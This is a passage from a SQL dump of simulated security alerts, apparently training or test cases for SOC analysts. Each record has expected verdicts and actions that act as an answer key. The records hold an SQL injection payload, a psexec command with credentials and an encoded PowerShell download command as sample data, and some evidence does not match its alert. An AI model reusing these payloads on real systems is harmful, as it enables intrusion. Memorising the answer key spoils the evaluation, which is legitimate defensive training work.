203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.4.5\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1029, 'Suspicious Email Activity with Spoofed Domain', 'low', 'SentinelOne', 'Email received from a domain that appears to be spoofed, mimicking a legitimate organization.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-17T12:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"192.168.5.10\",\"username\":\"c.jones\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"support@micros0ft.com\",\"url\":\"http://malicious-link.com/reset\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP has been reported for sending phishing emails\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@micros0ft.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Email domain is a known spoof of \'microsoft.com\'\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/reset\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL used in phishing campaigns\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email appeared suspicious due to the spoofed domain but no malicious activity was confirmed.\"}', 'Expert', 'SIEM', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.733Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T12:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"192.168.5.10\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"MAIL-SERVER\\\",\\\"email_sender\\\":\\\"support@micros0ft.com\\\",\\\"url\\\":\\\"http://malicious-link.com/reset\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1030, 'Legitimate Software Update Mistaken as Malware', 'medium', 'Splunk', 'A software update process was flagged as malicious due to heuristic detection, but analysis reveals it is benign.', 'Malware', 'T1203', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-17T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.6.30\",\"username\":\"m.brown\",\"hostname\":\"DEV-SERVER\",\"command_line\":\"C:\\\\Program Files\\\\Update\\\\updater.exe /silent\",\"file_hash\":\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\"}', '2026-01-17 19:11:07', '2026-02-26 22:01:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the development server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Update\\\\updater.exe /silent\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as part of a legitimate update process\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash matched known legitimate software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The flagged process was a legitimate software update misidentified by heuristic analysis.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.735Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T14:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.30\\\",\\\"username\\\":\\\"m.brown\\\",\\\"hostname\\\":\\\"DEV-SERVER\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Update\\\\\\\\updater.exe /silent\\\",\\\"file_hash\\\":\\\"a7e5b8c2d9f1e3f0a1b5c6d7e8f9a1b2\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1031, 'Lateral Movement Using PSExec Detected', 'high', 'SentinelOne', 'Detected lateral movement activity using PSExec, indicating possible internal reconnaissance or privilege escalation.', 'Lateral Movement', 'T1569.002', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-17T16:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.7.40\",\"dst_ip\":\"192.168.7.41\",\"username\":\"admin\",\"hostname\":\"CORP-ADMIN-PC\",\"command_line\":\"psexec.exe \\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.7.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP of the lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.7.41\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target IP of the lateral movement attempt\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec used for lateral movement activity\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"monitor_internal_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Use of PSExec for lateral movement suggests an attacker is attempting to move within the network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.736Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T16:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.7.40\\\",\\\"dst_ip\\\":\\\"192.168.7.41\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-ADMIN-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.7.41 -u admin -p password123 cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1041, 'Malware Detected: Known Malicious File Executed', 'critical', 'CrowdStrike', 'A known malware file was detected and executed on an internal host. The file hash is associated with multiple malware reports.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-22T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"198.51.100.5\",\"username\":\"jdoe\",\"hostname\":\"WIN-10JDOE\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"malicious-domain.com\"}', '2026-01-22 13:14:49', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the affected machine.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in 62 antivirus engines indicating malware.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in known malware distribution campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\badfile.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of known malicious executable.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and domain are confirmed malicious by multiple sources. Immediate host isolation and remediation are recommended.\"}', 'Novice', 'EDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1042, 'Malware Execution Detected on Internal Host', 'high', 'CrowdStrike', 'A suspicious process execution was detected on an internal host. The process matches a known malware signature, indicating potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-23T14:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.88\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c powershell -enc aQBmKChUZXN0LU5ldChbU3lzdGVtLk5ldC5JUFZlcnNpb25TcGVjaWZpY2F0aW9uXSkpLkFkZHJlc3NFbmQ9PSIyMDMuMC4xMTMuODgiKXtJbnZva2UtV2ViUmVxdWVzdFswXTt9\"}', '2026-01-23 16:38:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c powershell -enc aQBmKChUZXN0LU5ldChbU3lzdGVtLk5ldC5JUFZlcnNpb25TcGVjaWZpY2F0aW9uXSkpLkFkZHJlc3NFbmQ9PSIyMDMuMC4xMTMuODgiKXtJbnZva2UtV2ViUmVxdWVzdFswXTt9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command executing a known malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious IP and the execution of an encoded PowerShell script indicate a malware infection.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1043, 'Potential SQL Injection Attack on Web Application', 'medium', 'Wazuh', 'A potential SQL injection attempt was detected targeting a web application. The attacker tried to manipulate the database query through user input.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-23T10:15:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"username\":\"guest\",\"hostname\":\"WEB-SERVER01\",\"url\":\"/login\"}', '2026-01-23 16:38:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with scanning activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Targeted login endpoint of the web application\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contains a classic SQL injection pattern, indicating a true positive attack attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 